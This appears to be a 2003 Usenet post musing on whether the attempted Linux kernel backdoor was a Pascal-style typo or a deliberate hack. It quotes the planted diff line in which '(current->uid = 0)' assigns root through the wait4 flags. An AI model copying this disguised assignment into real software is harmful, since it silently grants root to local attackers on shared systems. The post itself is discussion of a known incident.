Re: C's trikery semantic opens up backdoor in new Linux kernel

[dmytrylavrov@fsmail.net (Dmytry Lavrov)]

Adrian Hoe <adrianhoe@nowhere.com> wrote in message news:<3FB5B35E.7060900@nowhere.com>...
> On second thought, this is a great example for my Ada Seminar. I shall 
> include it into the slides.

On my second:
i have readed somewhere on that web links,that it's "surely very smart
hacker":
"he also added extra () to avoid warnings..." ;-)

I can write in pascal/ada:

if (options=__WCLONE or __WALL)and(current.uid=0) then something

,that () are really needed because "and" have bigger priority than "="
so it's why i said about pascal background:it's very possible to be
typo,everyone with pascal background working in C many times maked
such mistakes,avoiding all warnings ;-)!
And i think after spending days/weeks, foget that nightmare is quite
hard.(anyway,somehow i newer maked that bug yet,only because i know
that mistake)

Or it's hacker with pascal background ,or he know someone with pascal
background and that mistakes,in any case somehow he know that common
pascal-->c typo and was able to insert it. Or it's really typo that
someone wasn't removed,just because it's so cool,saying for
himself:it's test if they check code...it's only test... ;-) .
(Raskolnikov,blin ;-)

They also truing to put that it's someone hacked CVS and added it into
code.
IMO quite inprobable.;-)if so,that hacker was able to put it into old
code,avoiding problems with reviews,and it's also possible to hack all
main CVS'es avoiding problems with updates, if you can hack one
CVS,you can hack all.

I really worry now,almost all commercial code probably contain such
cool things...including safety critical c code in airplanes...nuclair
plants...almost everyone,not only with pascal background, can make
that typo,find it,and then not remove because it's too cool...

....just for tesst,jussst for tessst,my beauty...ssss....
...and then it's too late to show it...

....good idea: that mistake as ring in "Lord of the Ring"....


Regards,

Dmytry Lavrov.
p.s.
if it's hacker,probably there's should be other bugs left to use that
trojan, some bugs(buffer overflow) allows remote user to execute his
code,but non-root.Else that trojan don't make impact on,for
example,me. It's only bad for website hosting servers,if you have
account,and for other multiuser systems.Why he need to hack multi-user
systems...don't know why he may need that.

So if it's hacker,at least 1/2 or more probablity that one other
trojan left unnoticed( not in kernel,in netscape or other internet
prog...like Morriss'days bug ).

More nice typos with *....

> 
> Dmytry Lavrov wrote:
> 
> >>>>+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
> >>>>+ retval = -EINVAL;
> >>>>
> > 
> > Hahaha......(falling ,and still laughing!)
> > 
> > So cool!
> > 
> > anyway, 0==something looks like complete idiotism for me,perhaps for
> > that guy too ;-))).Someone with Pascal background,or hacker or it's
> > simply typo,or all together ;-))))
> >